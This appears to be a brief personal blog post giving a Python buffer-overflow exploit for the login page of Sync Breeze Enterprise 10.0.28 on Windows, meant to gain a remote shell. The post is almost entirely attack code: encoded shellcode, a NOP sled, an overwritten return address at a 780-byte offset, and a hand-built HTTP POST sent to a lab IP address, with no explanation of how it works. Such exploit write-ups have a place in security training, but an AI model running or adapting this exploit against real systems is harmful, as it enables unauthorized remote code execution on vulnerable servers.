Bufferoverflow

Simple Buffer-Over-Flow on an webserver

This is post is about making a buffer overflow exploit to get a remote shell. We will exploit Sync Breeze Enterprize 10.0.28 on a windows box. PS: This post is not updated. If I get time I will write the code’s explaination. Thank you<3

import socket
badchars=("\xba\xa7\x57\x4f\xe1\xda\xda\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x52\x31\x56\x12\x83\xc6\x04\x03\xf1\x59\xad\x14\x01\x8d\xb3"
"\xd7\xf9\x4e\xd4\x5e\x1c\x7f\xd4\x05\x55\xd0\xe4\x4e\x3b\xdd"
"\x8f\x03\xaf\x56\xfd\x8b\xc0\xdf\x48\xea\xef\xe0\xe1\xce\x6e"
"\x63\xf8\x02\x50\x5a\x33\x57\x91\x9b\x2e\x9a\xc3\x74\x24\x09"
"\xf3\xf1\x70\x92\x78\x49\x94\x92\x9d\x1a\x97\xb3\x30\x10\xce"
"\x13\xb3\xf5\x7a\x1a\xab\x1a\x46\xd4\x40\xe8\x3c\xe7\x80\x20"
"\xbc\x44\xed\x8c\x4f\x94\x2a\x2a\xb0\xe3\x42\x48\x4d\xf4\x91"
"\x32\x89\x71\x01\x94\x5a\x21\xed\x24\x8e\xb4\x66\x2a\x7b\xb2"
"\x20\x2f\x7a\x17\x5b\x4b\xf7\x96\x8b\xdd\x43\xbd\x0f\x85\x10"
"\xdc\x16\x63\xf6\xe1\x48\xcc\xa7\x47\x03\xe1\xbc\xf5\x4e\x6e"
"\x70\x34\x70\x6e\x1e\x4f\x03\x5c\x81\xfb\x8b\xec\x4a\x22\x4c"
"\x12\x61\x92\xc2\xed\x8a\xe3\xcb\x29\xde\xb3\x63\x9b\x5f\x58"
"\x73\x24\x8a\xcf\x23\x8a\x65\xb0\x93\x6a\xd6\x58\xf9\x64\x09"
"\x78\x02\xaf\x22\x13\xf9\x38\x8d\x4c\x1c\x84\x65\x8f\x1e\xe7"
"\x2e\x06\xf8\x6d\xc1\x4e\x53\x1a\x78\xcb\x2f\xbb\x85\xc1\x4a"
"\xfb\x0e\xe6\xab\xb2\xe6\x83\xbf\x23\x07\xde\x9d\xe2\x18\xf4"
"\x89\x69\x8a\x93\x49\xe7\xb7\x0b\x1e\xa0\x06\x42\xca\x5c\x30"
"\xfc\xe8\x9c\xa4\xc7\xa8\x7a\x15\xc9\x31\x0e\x21\xed\x21\xd6"
"\xaa\xa9\x15\x86\xfc\x67\xc3\x60\x57\xc6\xbd\x3a\x04\x80\x29"
"\xba\x66\x13\x2f\xc3\xa2\xe5\xcf\x72\x1b\xb0\xf0\xbb\xcb\x34"
"\x89\xa1\x6b\xba\x40\x62\x9b\xf1\xc8\xc3\x34\x5c\x99\x51\x59"
"\x5f\x74\x95\x64\xdc\x7c\x66\x93\xfc\xf5\x63\xdf\xba\xe6\x19"
"\x70\x2f\x08\x8d\x71\x7a")
nops="\x90"*10
eip="\x71\xE8\xF1\x77"
eip2="\x83\x0c\x09\x10"
buf="A"*780 +eip+"CCCC" +nops+badchars
#eip 42306142
#offset 780
#10090c83
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.29.130",80))
payload="username="+buf+"&password=A"
req="POST /login HTTP/1.1\r\n"
req+="Host: 192.168.29.129\r\n"
req+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
req+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
req+="Accept-Language: en-US,en;q=0.5\r\n"
req+="Referer: http://192.168.29.129/login\r\n"
req+="Connection: close\r\n"
req+="Content-Type: application/x-www-form-urlencoded\r\n"
req+="Content-Length: "+str(len(payload))+"\r\n"
req+="\r\n"
req+=payload
s.send(req)
print str(len(buf))
print req
s.close()

"

Written on August 4, 2020